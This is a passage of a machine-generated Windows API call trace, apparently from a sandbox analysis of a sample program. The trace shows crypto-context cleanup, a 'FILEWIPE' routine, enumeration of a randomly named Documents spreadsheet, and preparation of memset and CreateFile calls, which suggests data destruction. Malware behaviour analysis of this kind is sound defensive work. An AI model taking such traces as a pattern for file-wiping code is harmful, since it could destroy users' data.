lpMsg=0x6ae8bc) returned 0 [0033.606] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.606] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.607] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.607] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.607] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.607] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.607] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.607] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.607] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.607] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.607] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.609] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 1 [0033.609] TranslateMessage (lpMsg=0x6aed6c) returned 0 [0033.609] DispatchMessageW (lpMsg=0x6aed6c) returned 0x0 [0033.609] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae408) returned 1 [0033.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.610] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0033.610] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0033.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0033.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8cffd0 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.612] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.612] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.612] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.613] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.613] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c542c70, ftCreationTime.dwHighDateTime=0x1d5bccb, ftLastAccessTime.dwLowDateTime=0x14867a70, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x14867a70, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x4911, dwReserved0=0x0, dwReserved1=0x777648, cFileName="BN3xfsXKP2npRmT.ods", cAlternateFileName="BN3XFS~1.ODS")) returned 0x7c2240 [0033.613] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.613] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0033.613] CharLowerBuffW (in: lpsz="byte[18705]", cchLength=0xb | out: lpsz="byte[18705]") returned 0xb [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.614] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.614] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.614] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.614] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.614] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0033.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da378 [0033.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da378, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0033.615] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.615] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.615] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.615] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.615] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.615] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.615] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.615] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.616] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.616] RtlAllocateHeap 